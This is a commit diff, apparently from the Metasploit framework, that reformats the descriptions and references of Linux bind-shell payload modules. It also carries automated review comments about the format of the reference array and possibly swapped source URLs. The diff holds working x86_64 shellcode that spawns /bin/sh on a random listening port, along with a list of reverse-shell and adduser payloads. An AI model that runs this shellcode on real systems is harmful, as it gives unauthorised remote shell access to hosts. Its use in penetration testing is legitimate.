Fixes for #2350, random bind shellcode
* Moved shortlink to a reference. * Reformat e-mail address. * Fixed whitespace * Use multiline quote per most other module descriptions Still need to resplat the modules, but it's no big thang to do that after landing. Also, References do not seem to appear for post modules in the normal msfconsole. This is a bug in the UI, not for these modules -- many payloads would benefit from being explicit on their references, so may as well start with these.bug/bundler_fix
parent
31f265b411
commit
81a7b1a9bf
@ -1,11 +1,11 @@
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
stager_egghunt stager_sock_find stager_sock_reverse \
stager_egghunt stager_sock_find stager_sock_reverse \
stager_sock_reverse_icmp stager_sock_reverse_udp \
stager_sock_reverse_icmp stager_sock_reverse_udp \
stager_sock_reverse_udp_dns
stager_sock_reverse_udp_dns
STAGES=stage_tcp_shell stage_udp_shell
STAGES=stage_tcp_shell stage_udp_shell
SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
single_shell_bind_tcp_random_port
single_shell_bind_tcp_random_port
OBJS=${STAGERS} ${STAGES} ${SINGLE}
OBJS=${STAGERS} ${STAGES} ${SINGLE}
@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
@ruby -p -a -e ' \
@ruby -p -a -e ' \
$$F.shift; \
$$F.shift; \
$$F[0].tap { |s| \
$$F[0].tap { |s| \
s.tr! "A-F", "a-f"; \
s.tr! "A-F", "a-f"; \
t=s.dup; \
t=s.dup; \
s.clear; \
s.clear; \
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
STDIN.eof? ? s<< " # " : s<< "+# "; \
STDIN.eof? ? s<< " # " : s<< "+# "; \
}; \
}; \
$$_ = $$F.join(" ") + "\n"; \
$$_ = $$F.join(" ") + "\n"; \
' < $*.tmp > $@
' < $*.tmp > $@
@ -15,11 +15,13 @@ module Metasploit3
def initialize(info = {})
def initialize(info = {})
super(merge_info(info,
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
'Description' => %q{
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
Listen for a connection in a random port and spawn a command shell.
'Assembly source: http://goo.gl/TAveVc',
Use nmap to discover the open port: 'nmap -sS target -p-'.
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
},
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
'License' => BSD_LICENSE,
'License' => BSD_LICENSE,
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],
'Platform' => 'linux',
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Arch' => ARCH_X86_64,
'Payload' =>
'Payload' =>
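Review bot: The new `'References'` entry placed between `'License'` and `'Platform'` is a flat two-element array, `['URL', 'https://...']`, whereas module metadata elsewhere in the framework gives references as a list of `[type, value]` pairs; if the reference loader walks the outer array expecting pairs, the bare string `'URL'` and the URL string would each be read as a separate, malformed reference rather than as one URL reference. Wrapping it once more, `'References' => [['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm']],` follows that convention. The same flat shape is used in the second `initialize` hunk (the `ARCH_X86` module) and should be corrected there as well; it may also be why the commit message reports the references not showing up in msfconsole, though that is inferred. The `initialize` body continues past the end of this hunk into the `'Payload'` byte string.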
@ -31,21 +33,21 @@ module Metasploit3
"\x6a\x02" +# pushq $0x2
"\x6a\x02" +# pushq $0x2
"\x5f" +# pop %rdi
"\x5f" +# pop %rdi
"\xb0\x29" +# mov $0x29,%al
"\xb0\x29" +# mov $0x29,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x52" +# push %rdx
"\x52" +# push %rdx
"\x5e" +# pop %rsi
"\x5e" +# pop %rsi
"\x50" +# push %rax
"\x50" +# push %rax
"\x5f" +# pop %rdi
"\x5f" +# pop %rdi
"\xb0\x32" +# mov $0x32,%al
"\xb0\x32" +# mov $0x32,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\xb0\x2b" +# mov $0x2b,%al
"\xb0\x2b" +# mov $0x2b,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x57" +# push %rdi
"\x57" +# push %rdi
"\x5e" +# pop %rsi
"\x5e" +# pop %rsi
"\x48\x97" +# xchg %rax,%rdi
"\x48\x97" +# xchg %rax,%rdi
"\xff\xce" +# dec %esi
"\xff\xce" +# dec %esi
"\xb0\x21" +# mov $0x21,%al
"\xb0\x21" +# mov $0x21,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x75\xf8" +# jne 40009f
"\x75\xf8" +# jne 40009f
"\x52" +# push %rdx
"\x52" +# push %rdx
"\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
"\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
@ -54,7 +56,7 @@ module Metasploit3
"\x54" +# push %rsp
"\x54" +# push %rsp
"\x5f" +# pop %rdi
"\x5f" +# pop %rdi
"\xb0\x3b" +# mov $0x3b,%al
"\xb0\x3b" +# mov $0x3b,%al
"\x0f\x05" # syscall
"\x0f\x05" # syscall
}
}
))
))
end
end
@ -15,11 +15,13 @@ module Metasploit3
def initialize(info = {})
def initialize(info = {})
super(merge_info(info,
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
'Description' => %q{
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
Listen for a connection in a random port and spawn a command shell.
'Assembly source: http://goo.gl/V5OObo',
Use nmap to discover the open port: 'nmap -sS target -p-'.
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
},
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
'License' => BSD_LICENSE,
'License' => BSD_LICENSE,
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'],
'Platform' => 'linux',
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Arch' => ARCH_X86,
'Payload' =>
'Payload' =>
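Review bot: The reference URL added in this hunk ends in `shell_bind_tcp_random_port_x86_64.asm`, yet this module declares `'Arch' => ARCH_X86`, while the sibling module declared `ARCH_X86_64` references `tiny_shell_bind_tcp_random_port.asm`; the file names suggest the two URLs may have been swapped when the goo.gl shortlinks were expanded, which should be confirmed against the assembly sources before landing, since a wrong source reference misleads anyone auditing the payload bytes. If they were swapped, the fix is exchanging the two URL strings between the two `'References'` lines. The `initialize` body continues past the end of this hunk.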